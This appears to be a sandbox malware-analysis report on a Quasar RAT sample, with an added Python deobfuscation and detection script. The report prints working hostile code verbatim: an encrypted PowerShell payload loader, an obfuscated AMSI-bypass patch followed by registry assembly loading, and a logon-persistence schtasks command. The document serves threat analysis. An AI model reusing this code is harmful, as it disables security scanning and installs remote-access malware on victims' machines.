| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_817.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_817.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); |
| C:\Users\Admin\AppData\Local\Temp\Install.exe | "C:\Users\Admin\AppData\Local\Temp\Install.exe" |
| C:\Users\Admin\AppData\Local\Temp\New.exe | "C:\Users\Admin\AppData\Local\Temp\New.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GltjFXMlvWca{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oQWvtwOPduIOuT,[Parameter(Position=1)][Type]$aKAsteImeH)$NyuJkJekwgb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'An'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$NyuJkJekwgb.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+',H'+'i'+''+'d'+''+'e'+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$oQWvtwOPduIOuT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$NyuJkJekwgb.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$aKAsteImeH,$oQWvtwOPduIOuT).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $NyuJkJekwgb.CreateType();}$LfhTNAavYhWOb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'so'+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+'nsa'+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$tkVTlkSrYoAqOX=$LfhTNAavYhWOb.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'d'+'d'+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SaSEcIxCuVAlKzbddjk=GltjFXMlvWca @([String])([IntPtr]);$HmdVDdXquEAWmDMjvpbgoO=GltjFXMlvWca @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QHlCTCWFNUf=$LfhTNAavYhWOb.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'Ha'+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$XKyNmjxQMiAFWU=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$QHlCTCWFNUf,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+'r'+[Char](97)+'r'+'y'+''+'A'+'')));$bWzSjKjhbzFNVvjjH=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$QHlCTCWFNUf,[Object](''+'V'+'i'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$fMTzYjj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XKyNmjxQMiAFWU,$SaSEcIxCuVAlKzbddjk).Invoke('a'+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$FHYpRawSnVPHrnDIR=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$fMTzYjj,[Object](''+'A'+''+'m'+'s'+[Char](105)+'S'+'c'+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$sKIdMnejxT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bWzSjKjhbzFNVvjjH,$HmdVDdXquEAWmDMjvpbgoO).Invoke($FHYpRawSnVPHrnDIR,[uint32]8,4,[ref]$sKIdMnejxT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FHYpRawSnVPHrnDIR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bWzSjKjhbzFNVvjjH,$HmdVDdXquEAWmDMjvpbgoO).Invoke($FHYpRawSnVPHrnDIR,[uint32]8,0x20,[ref]$sKIdMnejxT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+'77'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" |
| C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{05d7a111-fc70-4e5f-bc1d-5268db5a4670}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SybViDMmHlQl.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
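The powershell.EXE command line at the top of this process list is an in-memory loader. Read back from its [Char](N)+'x' string splitting, it builds a delegate type ("ReflectedDelegate" / "InMemoryModule" / "MyDelegateType") with Reflection.Emit, takes GetProcAddress and GetModuleHandle from System.dll's Microsoft.Win32.UnsafeNativeMethods, resolves LoadLibraryA and VirtualProtect in kernel32.dll, loads amsi.dll and resolves AmsiScanBuffer, makes its first 8 bytes writable (VirtualProtect with 4 = PAGE_READWRITE), overwrites the first 6 with B8 57 00 07 80 C3, restores 0x20 = PAGE_EXECUTE_READ, and finally Assembly.Load()s the bytes stored in the HKLM\SOFTWARE registry value $77stager and invokes that assembly's entry point. The stub is mov eax,0x80070057 ; ret, so every scan returns E_INVALIDARG and the PowerShell host treats the scanned content as clean; the report's later signatures (a child created under winlogon.exe as parent, SetThreadContext on dllhost.exe) come from the assembly loaded this way. The script below is an added triage example, not part of the report or of the sample: it recovers the split strings and decodes the patch from a constructed excerpt that copies a few fragments of the command line verbatim. The regexes and function names are this example's own.

```python
"""Recover plaintext from the [Char](N)+'x' string splitting used in the
PowerShell loader above, and decode the 6-byte AmsiScanBuffer patch."""
from __future__ import annotations

import re
import struct

# Constructed excerpt: five statements copied verbatim from the report's
# command line. It is not the whole command, just enough to exercise the code.
SAMPLE = """
$bWzSjKjhbzFNVvjjH=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$QHlCTCWFNUf,[Object](''+'V'+'i'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));
$fMTzYjj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XKyNmjxQMiAFWU,$SaSEcIxCuVAlKzbddjk).Invoke('a'+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');
$FHYpRawSnVPHrnDIR=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$fMTzYjj,[Object](''+'A'+''+'m'+'s'+[Char](105)+'S'+'c'+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FHYpRawSnVPHrnDIR,6);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+'77'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
"""

# One term of a chain is either a single-quoted literal or [Char](N);
# a chain is two or more terms joined by '+'.
TERM = r"(?:'[^']*'|\[Char\]\(\d+\))"
RUN = re.compile(TERM + r"(?:\+" + TERM + r")+")
PIECE = re.compile(r"'([^']*)'|\[Char\]\((\d+)\)")


def decode_run(run: str) -> str:
    """Concatenate one '..'+[Char](N)+'..' chain into its plaintext."""
    return "".join(chr(int(code)) if code else lit
                   for lit, code in PIECE.findall(run))


def deobfuscate(script: str) -> str:
    """Replace every concatenation chain with a single quoted literal."""
    return RUN.sub(lambda m: "'" + decode_run(m.group(0)) + "'", script)


def recovered_strings(script: str) -> list[str]:
    """All chains in the script, decoded, in order of appearance."""
    return [decode_run(m.group(0)) for m in RUN.finditer(script)]


def find_patch_bytes(script: str) -> bytes | None:
    """Pull the [Byte[]](...) literal handed to Marshal::Copy, if present."""
    m = re.search(r"\[Byte\[\]\]\(([^)]*)\)", script)
    if not m:
        return None
    return bytes(int(tok.strip(), 0) for tok in m.group(1).split(","))


def describe_patch(patch: bytes) -> str:
    """Decode the usual 'mov eax, imm32 ; ret' stub (B8 imm32 C3)."""
    if len(patch) == 6 and patch[0] == 0xB8 and patch[5] == 0xC3:
        imm = struct.unpack("<I", patch[1:5])[0]
        return f"mov eax, 0x{imm:08X} ; ret"
    return "unrecognised stub: " + patch.hex()


def amsi_patch_indicators(script: str) -> dict[str, bool]:
    """Detection view: the pieces that together make up this AMSI bypass."""
    clear = deobfuscate(script)
    return {
        "loads_amsi_dll": "'amsi.dll'" in clear,
        "resolves_AmsiScanBuffer": "'AmsiScanBuffer'" in clear,
        "resolves_VirtualProtect": "'VirtualProtect'" in clear,
        "writes_code_bytes": "Marshal]::Copy([Byte[]]" in clear,
        "loads_assembly_from_registry":
            "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]" in clear,
    }


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(recovered_strings(SAMPLE))
    patch = find_patch_bytes(SAMPLE)
    print(patch.hex(), "->", describe_patch(patch))
    print(amsi_patch_indicators(SAMPLE))
```

Run against the full command line the same decoder also yields the delegate and type names, the kernel32.dll / LoadLibraryA / GetProcAddress strings and the SOFTWARE key and $77stager value, which is the list worth carrying into a detection rule; the register-level indicators (`'AmsiScanBuffer'` next to a `Marshal]::Copy([Byte[]]` write) hold regardless of how the strings are split.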
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-25501.portmap.host | udp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
memory/4628-2-0x0000000073B0E000-0x0000000073B0F000-memory.dmp
memory/4628-3-0x00000000052C0000-0x00000000052F6000-memory.dmp
memory/4628-5-0x0000000007AD0000-0x00000000080F8000-memory.dmp
memory/4628-4-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4628-6-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4628-7-0x00000000079F0000-0x0000000007A12000-memory.dmp
memory/4628-8-0x0000000008100000-0x0000000008166000-memory.dmp
memory/4628-9-0x0000000008350000-0x00000000083B6000-memory.dmp
memory/4628-10-0x00000000083C0000-0x0000000008710000-memory.dmp
memory/4628-13-0x00000000082C0000-0x00000000082DC000-memory.dmp
memory/4628-14-0x0000000008B80000-0x0000000008BCB000-memory.dmp
memory/4628-15-0x0000000008A30000-0x0000000008AA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtgd3xbi.pt3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4628-26-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4628-31-0x000000000B2B0000-0x000000000B928000-memory.dmp
memory/4628-32-0x0000000009A40000-0x0000000009A5A000-memory.dmp
memory/4628-33-0x00000000099F0000-0x00000000099F8000-memory.dmp
memory/4628-34-0x0000000009B20000-0x0000000009C12000-memory.dmp
memory/4628-35-0x000000000D930000-0x000000000DE2E000-memory.dmp
memory/4884-45-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-46-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-47-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-64-0x00000000093A0000-0x00000000093D3000-memory.dmp
memory/4884-66-0x00000000706E0000-0x000000007072B000-memory.dmp
memory/4884-67-0x0000000009380000-0x000000000939E000-memory.dmp
memory/4884-65-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-72-0x0000000009520000-0x00000000095C5000-memory.dmp
memory/4884-73-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-74-0x0000000009710000-0x00000000097A4000-memory.dmp
memory/4884-159-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-166-0x0000000073B00000-0x00000000741EE000-memory.dmp
C:\Users\Admin\AppData\Roaming\startup_str_817.vbs
| MD5 | af3b7323ae40be47582f3d8ccab8120c |
| SHA1 | c1ee2a6f5e92f32df41da9e44fe48ecab9f967fd |
| SHA256 | e2b510081177244136bbdd64ca178db9be492354945121cd2d09dc8729423340 |
| SHA512 | 4dbc9ba62e28e8615b3302d37a954eeb493b444fa582b4c8dc22426b680c2d2debe8c785e6df630694c549d81d28aa3b08eb8e6cb68df8d17d379879d634aa54 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | ac3d19fbb5c5f10833f1882308f77548 |
| SHA1 | ac880466fd99a5719fedc7289b00d78ba7088e06 |
| SHA256 | 3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df |
| SHA512 | b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 465ec9d670c5e7cc2338a821a9cbaefe |
| SHA1 | 9ce43163c45051a781fed07a659f849ab21b7835 |
| SHA256 | 6b7d75bf8fc573cc3e2ebb16b6dc634821e93c172157a890daa71c24838632b2 |
| SHA512 | 1062dedbf1fc15bf717149ad56b7d7d8ab7391f4da350314a1c7221cee391f8358b3a5a3fb109349ee9cde69fd4d0a0a6a3ad25df1b8ba380c9b9dd16ceb7e2c |
C:\Users\Admin\AppData\Roaming\startup_str_817.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/4616-205-0x000000000AD80000-0x000000000AE12000-memory.dmp
memory/4616-204-0x000000000AC60000-0x000000000ACCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
memory/4264-222-0x0000000000520000-0x000000000058C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
memory/4628-224-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4616-225-0x00000000072D0000-0x00000000072E2000-memory.dmp
memory/4072-230-0x000001DB29730000-0x000001DB29752000-memory.dmp
memory/4072-233-0x000001DB41D80000-0x000001DB41DF6000-memory.dmp
memory/4616-234-0x0000000009820000-0x000000000985E000-memory.dmp
memory/4616-242-0x00000000098D0000-0x00000000098DA000-memory.dmp
memory/4072-261-0x000001DB41E00000-0x000001DB41E2A000-memory.dmp
memory/4072-263-0x00007FF998490000-0x00007FF99853E000-memory.dmp
memory/4072-262-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp
memory/1056-264-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-267-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-266-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-265-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-272-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-274-0x00007FF998490000-0x00007FF99853E000-memory.dmp
memory/1056-273-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp
memory/1056-275-0x0000000140000000-0x0000000140008000-memory.dmp
memory/580-279-0x0000028AD36D0000-0x0000028AD36FA000-memory.dmp
memory/580-278-0x0000028AD36A0000-0x0000028AD36C5000-memory.dmp
memory/580-280-0x0000028AD36D0000-0x0000028AD36FA000-memory.dmp
memory/636-295-0x000002287EDD0000-0x000002287EDFA000-memory.dmp
memory/744-305-0x000001C711750000-0x000001C71177A000-memory.dmp
memory/744-306-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/744-300-0x000001C711750000-0x000001C71177A000-memory.dmp
memory/908-316-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/908-310-0x000001AFE3C10000-0x000001AFE3C3A000-memory.dmp
memory/908-315-0x000001AFE3C10000-0x000001AFE3C3A000-memory.dmp
memory/636-290-0x000002287EDD0000-0x000002287EDFA000-memory.dmp
memory/636-296-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/580-285-0x0000028AD36D0000-0x0000028AD36FA000-memory.dmp
memory/580-286-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/1008-325-0x00000272CA420000-0x00000272CA44A000-memory.dmp
memory/1008-326-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/1008-320-0x00000272CA420000-0x00000272CA44A000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 48834f416d76621ea289ca1263d613ec |
| SHA1 | 8badffc9d8ee257ec4b8f8d506f690fb86ce781e |
| SHA256 | 9dfdc67a40014892d0af20b130ade05058418d3d4295f628d39cb898b8dedf58 |
| SHA512 | 63b7bf38b7572f975bbb18c8ccb32aea344fd404d9037884ab60359dc87662bf175958b5851c2d50f32d3e2d436a887d71ccc8516b9c4f337577ef4dc88a26e4 |
C:\Users\Admin\AppData\Local\Temp\SybViDMmHlQl.bat
| MD5 | c015fdc361eeeb71cb0244e420b2ef89 |
| SHA1 | 22d97ffc632bcd2b4481383d040eaba38d111f13 |
| SHA256 | bd7e8174609f6ca1a59d3ffe0194af72103762fa58fdc87f16dd6c1a9844c7f8 |
| SHA512 | a26bea5ae843d9e302f972aa34a2f6e05e03f1e479c999475ce7784942a735b1fc74dc3eb2c5a1123439168a176d7dfad05c57f5c09147f9ae30bc4ebcd48fea |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\05-28-~1
| MD5 | 668c9d9256a82a28f5769c6010a48665 |
| SHA1 | 514feb1105a5c6e4e0c877bab7ae7283877ca9e6 |
| SHA256 | f797408c1bbf907851fa5501093fbee68506eace9ef2439e9dba5ac61a262daa |
| SHA512 | b22c4662ee5e89a7509af58b4ebcab4d4df8bae8fbc37dd17da42ed970adbcdc2abb5b24dabfa888680a164d69a3dda1c3bf2bfa42dc39f973e8828a27f6a5af |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 13:52
Reported
2024-05-28 13:58
Platform
win10v2004-20240426-en
Max time kernel
300s
Max time network
225s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3504 created 604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
